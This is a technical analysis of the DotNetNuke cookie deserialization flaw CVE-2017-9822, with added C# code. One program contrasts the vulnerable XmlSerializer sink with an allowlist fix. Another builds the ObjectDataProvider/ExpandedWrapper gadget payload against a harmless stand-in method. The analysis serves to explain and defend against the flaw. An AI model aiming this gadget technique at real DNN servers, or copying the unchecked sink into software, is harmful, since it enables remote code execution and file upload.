DotNetNuke arbitrary code execution vulnerability (CVE-2017-9822)


### 0x00 Background

> DNN uses web cookies to identify users. A malicious user can decode one of such cookies and identify who that user is, and possibly impersonate other users and even upload malicious code to the server.
>
> -- DNN Security Center

On July 5, 2017, the DNN security team published an advisory for the critical vulnerability CVE-2017-9822. The researchers who reported it, Alvaro Muñoz (@pwntester) and Oleksandr Mirosh, then disclosed some of the details at Black Hat USA 2017. 360CERT followed up with an analysis of the vulnerability and of the attack scenarios that arise when .NET code uses XmlSerializer for serialization and deserialization, and rates it as critical.

### 0x01 Vulnerability overview

DNNPersonalization is the cookie DNN uses to store a logged-in user's personalization data. An attacker can modify this cookie to achieve arbitrary file upload, remote code execution and other attacks against the server.

### 0x02 Impact

* Vulnerability rating: Critical
* Reportedly more than 750,000 users worldwide build their websites on DNN, so the scope of impact is broad.
* Affected versions: all versions from 5.0.0 to 9.1.0
* Fixed versions: DNN Platform 9.1.1 and EVOQ 9.1.1

### 0x03 Vulnerability details

The attacker-controlled DNNPersonalization cookie reaches an XmlSerializer deserialization call with no check on the type being deserialized. The code path is as follows.

#### 1. Vulnerable code

PersonalizationController.cs, lines 66-72:

![](https://images.seebug.org/1501726617185)

The DNNPersonalization value is read from the cookie and passed to the DeserializeHashTableXml method of Globals.

Globals.cs, lines 3687-3690:

![](https://images.seebug.org/1501726660263)

This in turn calls the DeSerializeHashtable method of XmlUtils.

XmlUtils.cs, lines 184-218:

![](https://images.seebug.org/1501726692526)

The method reads the `type` attribute of each `item` element to decide which type to deserialize into, and at line 208 deserializes the element content as that type. That line is the trigger point of the vulnerability. The path from the input to the exploitable deserialization call is short and direct; the next section looks at how a deserialization point of this kind, one that uses XmlSerializer, is attacked.

### 0x04 Exploitation analysis

#### 1. How XmlSerializer is used

![](https://images.seebug.org/1501726735223)

When a class is serialized or deserialized, the type information of that class has to be passed to the serializer. The generated serialized data looks like this:

![](https://images.seebug.org/1501726755580)

It is an XML document in which the class name and the member variables are represented as elements.

#### 2. Structure of the gadget chain

Modify the TestClass above so that the member variable `test` is wrapped in a property.

![](https://images.seebug.org/1501726792120)

Watching the output during deserialization shows clearly that the setter is called automatically, so a setter can serve as the first step of the chain. The next step is to find classes that can be used for the attack. System.Windows.Data.ObjectDataProvider can call any method of any class referenced at runtime. An example:

![](https://images.seebug.org/1501726849830)

This is equivalent to TestClass.FuncExample("JustATest!"). The member variables of ObjectDataProvider are wrapped in properties, and after every setter call it checks whether the parameters are complete; once they are, it automatically invokes the method that was passed in. The following figure, borrowed from the Black Hat talk, shows the process.

![](https://images.seebug.org/1501726870467)

So if the serialized object is an ObjectDataProvider, deserializing it produces an arbitrary method call. All that remains is to find a class with a method that achieves the desired effect. DNN itself contains one that gives arbitrary file upload: the PullFile method of DotNetNuke.Common.Utilities.FileSystemUtils.

![](https://images.seebug.org/1501726893082)

#### 3. Payload generation

Generating the payload has one small problem to solve: ObjectDataProvider holds its target in a member of type System.Object (objectInstance), so at serialization time XmlSerializer does not know the concrete type of that member and fails to serialize it. This can be solved with ExpandedWrapper, whose generic parameter supplies the missing type.

![](https://images.seebug.org/1501726915616)

The generated content is as follows:

![](https://images.seebug.org/1501726955498)

DNN takes the value of the item's `type` attribute, calls Type.GetType to obtain the type of the serialized data, and then deserializes. The attribute therefore has to include the corresponding assembly name; the following code obtains the type string:

![](https://images.seebug.org/1501726993083)

![](https://images.seebug.org/1501727002827)

Combining this with the DNN code produces the final payload:

![](https://images.seebug.org/1501727022918)

### 0x05 Exploit verification

The exploit was verified locally at the trigger point, the DeSerializeHashtable function:

![](https://images.seebug.org/1501727055112)

On the server side the exploit can be seen to have succeeded:

![](https://images.seebug.org/1501727076976)
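The trigger point described in section 0x03, attacker-named type in the `type` attribute fed straight into `Type.GetType` and `XmlSerializer`, is easier to reason about next to a version that refuses unknown types. The following is an added illustration written for this page; it is not DNN's code, and the hardened variant is my own allowlist design, not the vendor patch. The cookie values and the `Demo:Mode` key are constructed for the demo.

```csharp
// Added illustration, not DNN's own code: the DNNPersonalization sink pattern
// from 0x03 (attacker-named type -> XmlSerializer) beside a hardened version.
// Plain .NET (Framework 4.x or .NET 6+), no extra references needed.
using System;
using System.Collections;
using System.Collections.Generic;
using System.IO;
using System.Xml;
using System.Xml.Serialization;

public static class PersonalizationSink
{
    // Vulnerable pattern, modelled on XmlUtils.DeSerializeHashtable: the "type"
    // attribute of each <item> selects the XmlSerializer, so whoever controls the
    // cookie controls which type is instantiated and which setters run.
    public static Hashtable DeserializeUnsafe(string profileXml)
    {
        var table = new Hashtable();
        foreach (XmlElement item in LoadItems(profileXml))
        {
            Type type = Type.GetType(item.GetAttribute("type"), throwOnError: true, ignoreCase: true);
            var serializer = new XmlSerializer(type);
            using (var reader = new StringReader(item.InnerXml))
                table[item.GetAttribute("key")] = serializer.Deserialize(reader);
        }
        return table;
    }

    // Hardened variant (my design, not the vendor patch): the type name is looked up
    // in a fixed allowlist of plain value types and must match exactly. Nothing else
    // reaches Type.GetType, so no assembly is loaded and no gadget class can be named.
    private static readonly Dictionary<string, Type> Allowed =
        new Dictionary<string, Type>(StringComparer.Ordinal)
        {
            ["System.String"]   = typeof(string),
            ["System.Int32"]    = typeof(int),
            ["System.Boolean"]  = typeof(bool),
            ["System.DateTime"] = typeof(DateTime),
        };

    public static Hashtable DeserializeSafe(string profileXml)
    {
        var table = new Hashtable();
        foreach (XmlElement item in LoadItems(profileXml))
        {
            string typeName = item.GetAttribute("type");
            if (!Allowed.TryGetValue(typeName, out Type type))
                throw new InvalidDataException("personalization item type not allowed: " + typeName);
            var serializer = new XmlSerializer(type);
            using (var reader = new StringReader(item.InnerXml))
                table[item.GetAttribute("key")] = serializer.Deserialize(reader);
        }
        return table;
    }

    private static XmlNodeList LoadItems(string profileXml)
    {
        // XmlResolver = null: the cookie is untrusted, so never fetch DTDs or external entities.
        var doc = new XmlDocument { XmlResolver = null };
        doc.LoadXml(profileXml);
        return doc.SelectNodes("/profile/item");
    }

    public static void Main()
    {
        // Constructed cookie values for the demo (not captured from a real DNN site).
        const string benign =
            "<profile><item key=\"Demo:Mode\" type=\"System.String\"><string>VIEW</string></item></profile>";
        // Same layout, but the client has picked a different type. List<string> is harmless;
        // an attacker names a gadget type instead (the ObjectDataProvider chain of 0x04).
        const string hostile =
            "<profile><item key=\"Demo:Mode\" type=\"System.Collections.Generic.List`1[[System.String]]\">" +
            "<ArrayOfString><string>VIEW</string></ArrayOfString></item></profile>";

        Console.WriteLine("unsafe, benign : " + DeserializeUnsafe(benign)["Demo:Mode"]);
        // The vulnerable sink happily instantiates whatever type the cookie asked for.
        Console.WriteLine("unsafe, hostile: " + DeserializeUnsafe(hostile)["Demo:Mode"].GetType());
        Console.WriteLine("safe,   benign : " + DeserializeSafe(benign)["Demo:Mode"]);
        try
        {
            DeserializeSafe(hostile);
        }
        catch (InvalidDataException ex)
        {
            Console.WriteLine("safe,   hostile: rejected (" + ex.Message + ")");
        }
    }
}
```

The allowlist keyed on the exact string matters more than it looks: `Type.GetType` accepts assembly-qualified names, so a check that merely compares resolved types, or that is done after the call, still lets the server load and reflect over an attacker-chosen assembly before the comparison happens. Because the cookie is neither signed nor tied to a session, the check has to live in the parser itself.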
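To see the chain of section 0x04 end to end, the following added example (mine, not the page's or DNN's code) builds the ExpandedWrapper/ObjectDataProvider payload the way subsections 2 and 3 describe, but aims it at a harmless `TestClass.FuncExample` that only records the call, in place of `FileSystemUtils.PullFile`. It then pushes the result through the same `Type.GetType` plus `XmlSerializer.Deserialize` sequence the sink uses, so the method invocation can be observed on the deserializing side. `TestClass`, `FuncExample`, `GadgetDemo` and `SinkDeserialize` are names chosen for the demo.

```csharp
// Added example, not code from the page or from DNN: the ObjectDataProvider chain of
// section 0x04 with a harmless target class standing in for FileSystemUtils.PullFile.
// Build as a .NET Framework 4.x console app that references PresentationFramework,
// PresentationCore, WindowsBase and System.Data.Services (home of ExpandedWrapper).
using System;
using System.Data.Services.Internal;   // ExpandedWrapper<TExpandedElement, TProperty0>
using System.IO;
using System.Windows.Data;             // ObjectDataProvider
using System.Xml.Serialization;

// Stand-in target: this is what the gadget ends up calling. It records the call
// instead of fetching a file, so the demo has no side effects.
public class TestClass
{
    public static string LastCall;

    public void FuncExample(string arg)
    {
        LastCall = "FuncExample(\"" + arg + "\")";
        Console.WriteLine("[target] " + LastCall);
    }
}

public static class GadgetDemo
{
    // The wrapper type is what the cookie's "type" attribute has to name. Its generic
    // argument TestClass is what lets XmlSerializer emit and accept xsi:type="TestClass"
    // for ObjectInstance, which is declared as System.Object inside ObjectDataProvider.
    public static readonly Type PayloadType = typeof(ExpandedWrapper<TestClass, ObjectDataProvider>);

    public static string BuildPayload()
    {
        var odp = new ObjectDataProvider();
        // ObjectDataProvider re-evaluates after every property change and invokes MethodName
        // as soon as the instance, the name and the parameters are all present. That is the
        // whole gadget, and it also means FuncExample runs here, while the payload is being
        // built; for a destructive target one would write the XML by hand instead.
        odp.ObjectInstance = new TestClass();
        odp.MethodName = "FuncExample";
        odp.MethodParameters.Add("JustATest!");

        var wrapper = new ExpandedWrapper<TestClass, ObjectDataProvider> { ProjectedProperty0 = odp };
        using (var writer = new StringWriter())
        {
            new XmlSerializer(PayloadType).Serialize(writer, wrapper);
            return writer.ToString();
        }
    }

    // Value for the item's "type" attribute: Type.GetType on the server needs the assembly
    // names of ExpandedWrapper and of both generic arguments, which is what
    // AssemblyQualifiedName supplies.
    public static string PayloadTypeName() => PayloadType.AssemblyQualifiedName;

    // The sink reduced to the two calls that matter: resolve whatever type the input names,
    // then hand the input to an XmlSerializer for that type.
    public static object SinkDeserialize(string typeName, string xml)
    {
        Type type = Type.GetType(typeName, throwOnError: true, ignoreCase: true);
        using (var reader = new StringReader(xml))
            return new XmlSerializer(type).Deserialize(reader);
    }

    public static void Main()
    {
        string payload = BuildPayload();
        Console.WriteLine(payload);          // ProjectedProperty0 with ObjectInstance xsi:type="TestClass"
        Console.WriteLine(PayloadTypeName());

        TestClass.LastCall = null;
        object result = SinkDeserialize(PayloadTypeName(), payload);
        // During Deserialize the setters of ObjectDataProvider ran and FuncExample was invoked
        // with the string carried in the XML; nothing in the "application" referred to TestClass.
        Console.WriteLine("deserialized a " + result.GetType().Name + "; target recorded: " + TestClass.LastCall);
    }
}
```

Two points carry over to the real target. First, the generic argument of the wrapper must be a type the server can load, which is why the DNN payload uses `FileSystemUtils` from DotNetNuke.dll rather than a class of the attacker's; here `TestClass` lives in the demo assembly, so the same process resolves it. Second, ObjectDataProvider and ExpandedWrapper ship with the .NET Framework (PresentationFramework and System.Data.Services), so an ASP.NET host that never uses WPF or WCF Data Services can still load them through an assembly-qualified name.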